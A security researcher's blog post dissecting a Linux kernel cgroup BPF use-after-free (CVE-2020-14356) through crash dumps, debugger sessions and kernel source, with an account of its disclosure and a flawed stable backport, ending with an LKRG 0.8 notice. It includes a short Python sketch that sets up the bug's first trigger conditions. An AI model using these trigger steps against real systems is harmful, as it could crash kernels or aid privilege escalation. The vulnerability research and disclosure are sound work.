       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

PID 1060499 is a child of sshd:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: pi3@pts/3
...

The crash happens in the function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX is 0000000000000000. However, when I was playing with the repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b (the slab poison pattern):

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have some kind of Use-After-Free bug, and it is triggerable from user mode. I’ve looked at the binary in IDA:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...
	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);
	...
	if (type == BPF_CGROUP_INET_EGRESS) {
		ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY(
				cgrp->bpf.effective[type], skb,
				__bpf_prog_run_save_cb);
		...
	}
	...
}

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

points to a freed object. However, the kernel still keeps eBPF rules attached to the socket under cgroups. When the process (sshd) dies (the do_exit() call) and cleanup is executed, all sockets are closed. If such a socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with this logic and path. The real problem is that the cgroup disappeared while still having active clients. How is that even possible? Just before the crash I can see the following entry in the kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I tested the same scenario a few times and got the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. It sounds like it is being called while there could still be active sockets attached to such a cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if a cgroup dies, all the potential clients are auto-detached. However, they might not be aware of that situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to 1. However, in the warning logs printed before the kernel crashed, we saw that this reference counter was below 0. The cgroup had already been freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I prepared a patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time I rebooted the machine (100% repro). After this patch, the crash ratio dropped to around 30%. However, I was still able to hit the same code path and generate a kernel dump. The patch indeed helps, but it looks like it’s not the real problem, since I could still hit the crash (just much less often).

I stepped back and looked again at where the bug is. The corrupted pointer (struct cgroup *) is coming from this line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

This code is related to CONFIG_SOCK_CGROUP_DATA. The Linux source has an interesting comment about it in the “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information about whether net_prio or net_cls has started being used; in such a case, sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. From our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

The described socket keeps the “sk_cgrp_data” pointer with the information that it is “attached” to cgroup v2. However, that cgroup has been destroyed.
Now we have all the information to solve the mystery of this bug:

  1. A process creates a socket, and both of them are inside some cgroup v2 (non-root)
    • cgroup BPF is cgroup2-only
  2. At some point net_prio or net_cls starts being used:
    • this operation disables cgroup2 socket matching
    • now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
  3. The socket is cloned, but not the reference to the cgroup (ref: point 1)
    • this essentially moves the socket to the new cgroup
  4. All tasks in the old cgroup (ref: point 1) must die, and when this happens, that cgroup dies as well
  5. When the original process starts to “use” the socket, it might attempt to access a cgroup which is already “dead”. This essentially generates the Use-After-Free condition
    • in my specific case, the process was killed or invoked exit()
    • during the execution of the do_exit() function, all file descriptors and all sockets are closed
    • one of the sockets still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
    • __cgroup_bpf_run_filter_skb runs the attached BPF and we have a Use-After-Free
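The first two steps can be illustrated with a short Python sketch (hedged: the cgroup mount points are assumptions and depend on the distro; the cloning and teardown from steps 3–5 happen as a side effect of normal TCP accept() and process exit):

import os, socket

pid = str(os.getpid())

# Step 1: join a fresh, non-root cgroup v2 and create a socket there
# (assumes cgroup2 is mounted at /sys/fs/cgroup).
os.makedirs("/sys/fs/cgroup/uaf-demo", exist_ok=True)
with open("/sys/fs/cgroup/uaf-demo/cgroup.procs", "w") as f:
    f.write(pid)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # sk_cgrp_data -> this cgroup

# Step 2: activate net_prio on a legacy hierarchy -- this is the
# "disabling cgroup2 socket matching" event visible in the dmesg below
# (assumes a mounted net_prio v1 hierarchy).
with open("/sys/fs/cgroup/net_prio/cgroup.procs", "w") as f:
    f.write(pid)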

To confirm that scenario, I’ve modified some of the Linux kernel sources:

  1. Function cgroup_sk_alloc_disable():
    • I’ve added dump_stack();
  2. Function cgroup_bpf_release():
    • I’ve moved the mutex to guard the code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is executed multiple times. All cgroup BPF entries have been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory. 

First CVE – CVE-2020-14356:

I decided to report this issue to the Linux kernel security mailing list around mid-July 2020. Roman Gushchin replied to my report and suggested verifying whether I could still reproduce the issue with commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) applied. This commit had been merged into the Linux kernel git tree just a few days before my report. I carefully verified it, and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete, and the follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.


After this conversation, Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I decided to apply for a CVE number (through RedHat) to track this issue:

  1. CVE-2020-14356 was allocated to track this issue
  2. For some unknown reason, this bug was classified as a NULL pointer dereference 🙂

RedHat correctly acknowledged this issue as a Use-After-Free in their own description and bugzilla. However, in the CVE MITRE portal we can see a very inaccurate description:

  • “A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not a NULL pointer dereference but a Use-After-Free bug. Maybe it was misclassified based on this open bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of a NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern with CVE MITRE, but the invalid description is still there. There is also a small Twitter discussion about it here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During the analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to the LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised, since I had reviewed the original commit for the mainline kernel (5.7) and it was fine. With this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, the backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in a reference counter bug and, in the end, a Use-After-Free again. It looks like the backported patch for stable kernels was still buggy.

I contacted RedHat again and they started to provide correct patches for their own kernels. However, the LTS kernels were still buggy. I also asked for a separate CVE to be assigned for that issue, but RedHat suggested that I do it myself.

After that, I went on vacation and forgot about this issue 🙂 Recently, I decided to apply for a CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth pointing out that at some point someone from Huawei realized that the patch was wrong, and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

It is also worth mentioning that the grsecurity backport was never affected by CVE-2020-25220.

Summary:

The original issue, tracked by CVE-2020-14356, affects kernels from 4.5 up to 5.7.10.

  • RedHat correctly fixed all their kernels, and has proper description of the bug
  • CVE MITRE still has invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

  • 4.19 until version 4.19.140 (exclusive)
  • 4.14 until version 4.14.194 (exclusive)
  • 4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by CVE-2020-25220


Best regards,
Adam ‘pi3’ Zabrocki

LKRG 0.8

By: pi3
25 June 2020 at 21:49

Hi,

We’ve just announced a new version of LKRG – 0.8! It includes an enormous amount of changes – in fact, so many that we’re not trying to document all of them this time (although they can be seen in the git commits), but rather focus on high-level aspects. I encourage you to read the full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

